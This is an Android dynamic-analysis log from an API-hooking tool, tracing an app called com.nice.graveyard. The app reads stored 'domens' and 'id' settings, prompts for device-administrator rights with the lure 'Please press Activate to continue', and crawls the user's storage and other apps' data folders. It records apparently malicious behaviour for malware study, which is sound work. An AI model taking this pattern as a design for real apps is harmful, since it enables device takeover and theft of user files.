D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3801): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3801): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/com.nice.graveyard-1/base.apk]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/com.nice.graveyard/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/cache]
D/S4URC   ( 3801): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.nice.graveyard/com.nice.graveyard.longhornXf}]
D/S4URC   ( 3801): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [com.nice.graveyard]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][period] [Return][0]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][0]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][ping_time] [Value][1535744989628]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][domens] [Return][empty]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3801): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][empty]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard1]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/usb2host]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/usb3device]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/usb3host]
D/S4URC   ( 3801): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Download]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Download]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs]
D/S4URC   ( 3801): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3801): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3801): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.nice.graveyard/com.nice.graveyard.denoteZm}]
D/S4URC   ( 3801): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.app.action.ADD_DEVICE_ADMIN]
D/S4URC   ( 3801): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][key : value :android.app.extra.ADD_EXPLANATION ,Please press 'Activate' to continue. android.app.extra.DEVICE_ADMIN ,ComponentInfo{com.nice.graveyard/com.nice.graveyard.earthquakeEt} ]
D/S4URC   ( 3801): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][[key:value][android.app.extra.ADD_EXPLANATION:Please press 'Activate' to continue.][android.app.extra.DEVICE_ADMIN:ComponentInfo{com.nice.graveyard/com.nice.graveyard.earthquakeEt}]]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml]
D/S4URC   ( 3801): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/MyPref.xml.bak]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/LOST.DIR]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/LOST.DIR]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/LOST.DIR]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/.android_secure]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/.android_secure]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Music]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Music]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Music]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Podcasts]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Podcasts]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Podcasts]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Ringtones]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Ringtones]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Ringtones]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Alarms]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Alarms]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Alarms]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Notifications]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Notifications]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Notifications]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11304_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11304_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11309_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11309_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11310_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11310_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11314_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11314_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11315_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11315_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11427_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11427_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11429_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11429_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11432_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11432_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11437_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11437_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11516_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11516_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11519_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11519_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11520_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11520_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15573_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15573_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15575_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15575_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15660_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15660_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15663_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15663_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15667_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15667_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18658_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18658_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18660_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18660_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18664_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18664_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18667_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18667_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18673_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18673_lores.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/arctic_vir_2012147.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/arctic_vir_2012147.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/earth_lights_lrg.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/earth_lights_lrg.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/map.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/map.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/superflarecombo_lrg.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/superflarecombo_lrg.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/world.topo.bathy.200406.3x5400x2700.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/world.topo.bathy.200406.3x5400x2700.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/world.topo.bathy.200410.3x5400x2700.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/world.topo.bathy.200410.3x5400x2700.jpg]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Movies]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Movies]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Movies]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Download]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Download]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Download]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/DCIM]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/DCIM]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/DCIM]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache/ImageCache]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache/ImageCache]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache/ImageCache]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache/ImageCache]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache/ImageCache/journal]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache/ImageCache/journal]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache/imgcache.idx]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache/imgcache.idx]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache/imgcache.0]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache/imgcache.0]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache/imgcache.1]
D/S4URC   ( 3801): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache/imgcache.1]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files]
D/S4URC   ( 3801): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files/drive_content_do_not_modify]
